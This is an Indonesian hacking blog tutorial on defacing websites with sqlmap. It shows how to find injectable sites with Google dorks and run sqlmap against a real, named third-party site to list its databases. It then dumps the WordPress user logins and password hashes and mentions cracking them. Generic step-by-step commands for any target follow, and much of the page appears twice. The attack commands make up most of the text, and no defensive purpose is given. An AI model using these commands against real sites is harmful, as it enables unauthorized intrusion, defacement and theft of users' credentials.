DEFACE WEBSITE WITH SQLMAP 2014
Assalamu'alaikum sob (^_^). Mungkin tutorial ini agak jadul sob wkwkwkwk, karena sudah banyak blog yang memposting nya !! tapi ngak apa-apalah , untuk mengisi blog saya , adapun tutorial sqlmap pada windows dan bada backtrack hampir sama (^_^) tetapi pada windows agan harus menginstall sqlmap dan python.
Kelebihan menggunakan SQL Map:1. Bisa melakukan SQL Injection dengen beberapa method seperti:- Boolean-Based Blind SQL Injection- Time-Based Blind SQL Injection- Error-Based SQL Injection- UNION Query SQL Injection- Stacked Query SQL Injection2. Bisa berjalan baik untuk beberapa jenis database seperti:- MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase &SAP MaxDB
Langsung saja buka marinecyber sqli scanner di sini dan tulis google dork di kolumn yang tersedia , kalau google dork nya agan bisa lihat di sini atau di sini , dalam contoh ini saya menggunakan dork "inurl:opinions.php?id="
- pilih salah satu situs target nya disini saya menggunakan situs di bawah ini
Found : http://golosdoma2.com/opinions.php?id='21 <-- SQLI Vuln Found..
klik ajah link tersebut , dan saya melihat
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/users1/v/victarius/domains/golosdoma2.com/opinions.php on line 25
Bahwa situs tersebut memilki bug , dan insyaallah bisa di masuki sob (^_^)
- buka command prompt ketik " cd C:\Users\BL4CK_3YE116\Desktop\sqlmap " tanpa tanda petik , directory C:\Users\BL4CK_3YE116\Desktop\sqlmap merupakan directory folder tempat sqlmap berada
- setelah itu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) di sini saya menggunakan situs http://golosdoma2.com/opinions.php?id=22 , dan saya mengetik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 untuk scan situs tersebut
- lalu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) --dbs disini saya menggunakan sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 --dbs , untuk melihat database situs tersebut
Saya menemukan information_schema dan victarius
- saya menggunakan database " victarius " lalu sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius --tables untuk melihat tables dari database tersebut
Saya menemukan table wp_users yang menurut saya menarih , :) hehehe
- setelah itu ketik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users --column , untuk melhat column dari tables tersebut , lalu muncul
Saya pilih column ID,user_login,user_pass yang menurut saya menarik (^_^)
- dump column tersebut dengan cara sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users -C ID,user_login,user_pass --dump , lalu muncul dah
Password tersebut adalah MD5 wordpress , dan setahu saya ngak bisa di crack ! :( tapi dalam sqlmap ada tools untuk menebak jenis password tersebut dengan dictionary yang ada :) untuk melihat definisi dan jenis hash bisa di lihat di sin
Tambahan :
Biar lengkap saya kasih step-stepnya:- Test injeksi dengan men-fetch banner mysql (versi mysql)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --banner
- Fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db), langkah ini ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --current-user --current-db
- Fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (–dbs)
Dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi. ./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --dbs
- Fetch list tables di database portal dengan flag (-D nama_tabel –tables)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel --tables
- Fetch isi kolum pada setiap tables dengan flag (–columns)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel -T nama_kolom --columns
- Sekarang kita akan men-fetch hanya isi dari kolum dengan flag (-D nama_tabel -T kolom -C isi_kolom1,isi_kolom2 –dump)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel -T nama_kolom -C isi_kolom1,isi_kolom2 --dump
agan juga bisa menggunakan tools online marinecyber untuk memudahkan agan ,, tools hack di sini , saya menyediakan adminfinder scanner dan sqli scannersampai di sin saja saya mohon maaf jika ada salah kata , berhubung saya hanyalah seorang newbie yang ingin mencoba (^_^)
- pilih salah satu situs target nya disini saya menggunakan situs di bawah ini
Found : http://golosdoma2.com/opinions.php?id='21 <-- SQLI Vuln Found..
klik ajah link tersebut , dan saya melihat
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/users1/v/victarius/domains/golosdoma2.com/opinions.php on line 25
Bahwa situs tersebut memilki bug , dan insyaallah bisa di masuki sob (^_^)
- buka command prompt ketik " cd C:\Users\BL4CK_3YE116\Desktop\sqlmap " tanpa tanda petik , directory C:\Users\BL4CK_3YE116\Desktop\sqlmap merupakan directory folder tempat sqlmap berada
- saya menggunakan database " victarius " lalu sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius --tables untuk melihat tables dari database tersebut
Saya menemukan table wp_users yang menurut saya menarih , :) hehehe
- setelah itu ketik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users --column , untuk melhat column dari tables tersebut , lalu muncul
Saya pilih column ID,user_login,user_pass yang menurut saya menarik (^_^)
- dump column tersebut dengan cara sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users -C ID,user_login,user_pass --dump , lalu muncul dah
Password tersebut adalah MD5 wordpress , dan setahu saya ngak bisa di crack ! :( tapi dalam sqlmap ada tools untuk menebak jenis password tersebut dengan dictionary yang ada :) untuk melihat definisi dan jenis hash bisa di lihat di sin
Tambahan :
Biar lengkap saya kasih step-stepnya:
- Test injeksi dengan men-fetch banner mysql (versi mysql)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --banner
- Fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db), langkah ini ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --current-user --current-db
- Fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (–dbs)
Dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --dbs
- Fetch list tables di database portal dengan flag (-D nama_tabel –tables)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel --tables
- Fetch isi kolum pada setiap tables dengan flag (–columns)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel -T nama_kolom --columns
- Sekarang kita akan men-fetch hanya isi dari kolum dengan flag (-D nama_tabel -T kolom -C isi_kolom1,isi_kolom2 –dump)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel -T nama_kolom -C isi_kolom1,isi_kolom2 --dump
agan juga bisa menggunakan tools online marinecyber untuk memudahkan agan ,, tools hack di sini , saya menyediakan adminfinder scanner dan sqli scanner
sampai di sin saja saya mohon maaf jika ada salah kata , berhubung saya hanyalah seorang newbie yang ingin mencoba (^_^)